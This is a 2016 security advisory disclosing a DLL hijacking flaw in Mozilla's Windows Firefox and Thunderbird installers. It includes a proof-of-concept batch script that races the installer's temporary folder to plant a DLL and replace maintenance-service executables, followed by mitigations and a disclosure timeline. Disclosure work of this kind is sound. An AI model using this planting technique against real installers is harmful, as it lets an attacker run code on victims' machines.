Mozilla Firefox DLL Hijacking

2016-06-15T00:00:00
ID PACKETSTORM:137482
Type packetstorm
Reporter Stefan Kanthak
Modified 2016-06-15T00:00:00

Description

                                        
                                            `Hi @ll,  
  
<https://bugzilla.mozilla.org/show_bug.cgi?id=961676> should  
have fixed CVE-2014-1520 in Mozilla's executable installers for  
Windows ... but does NOT!  
  
JFTR: this type of vulnerability (really: a bloody stupid trivial  
beginner's error!) is well-known and well-documented as  
<https://cwe.mitre.org/data/definitions/379.html>.  
  
  
Proof of concept/demonstration:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
0. download "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",  
"Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"  
and save them in an arbitrary directory;  
  
1. download <http://home.arcor.de/skanthak/download/SHFOLDER.DLL>  
plus <http://home.arcor.de/skanthak/download/SENTINEL.EXE> and  
save them in an(other) arbitrary directory;  
  
2. start your editor, copy and paste the following 10 lines and  
save them as "POC.CMD" in the same directory as "SHFOLDER.DLL"  
and "SENTINEL.EXE" downloaded in step 1:  
  
:WAIT1  
@If Not Exist "%TEMP%\7z*.tmp" Goto :WAIT1  
For /D %%! In ("%TEMP%\7z*.tmp") Do Set foobar=%%!  
Copy "%~dp0shfolder.dll" "%foobar%\shfolder.dll"  
:WAIT2  
@If Not Exist "%foobar%\core\maintenanceservice.exe" Goto :WAIT2  
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice.exe"  
:WAIT3  
@If Not Exist "%foobar%\core\maintenanceservice_installer.exe" Goto :WAIT3  
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice_installer.exe"  
  
3. execute the batch script "POC.CMD" created in step 2;  
  
4. execute "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",  
"Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"  
downloaded in step 0. and proceed as directed: notice the message  
boxed displayed from the copies of "SHFOLDER.DLL" and "SENTINEL.EXE"  
placed by the batch script started in step 3 in the unsafe TEMP  
subdirectory created by Mozilla's vulnerable executable installers!  
  
PWNED!  
  
  
Mitigation(s):  
~~~~~~~~~~~~~~  
  
0. don't use executable installers. DUMP THEM, NOW!  
  
1. see <http://home.arcor.de/skanthak/!execute.html> as well as  
<http://home.arcor.de/skanthak/SAFER.html>.  
  
2. stay away from Mozilla's vulnerable installers for their Windows  
software (at least until Mozilla starts to develop a sense for  
the safety and security of their users).  
  
  
stay tuned  
Stefan Kanthak  
  
  
Timeline:  
~~~~~~~~~  
  
2015-10-25 <https://bugzilla.mozilla.org/show_bug.cgi?id=1218199>  
  
not even an attempt to fix this vulnerability (check but  
<https://blog.mozilla.org/blog/2015/10/23/mozilla-launches-open-source-support-program/>)  
  
2016-04-30 <https://bugzilla.mozilla.org/show_bug.cgi?id=1269111>  
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269113>  
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269122>  
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269123>  
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269142>  
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269144>  
  
not even an attempt to fix this vulnerability (check but  
<https://blog.mozilla.org/blog/2016/06/09/help-make-open-source-secure/>)  
  
2016-06-15 deadline expired after 45 days, report published  
`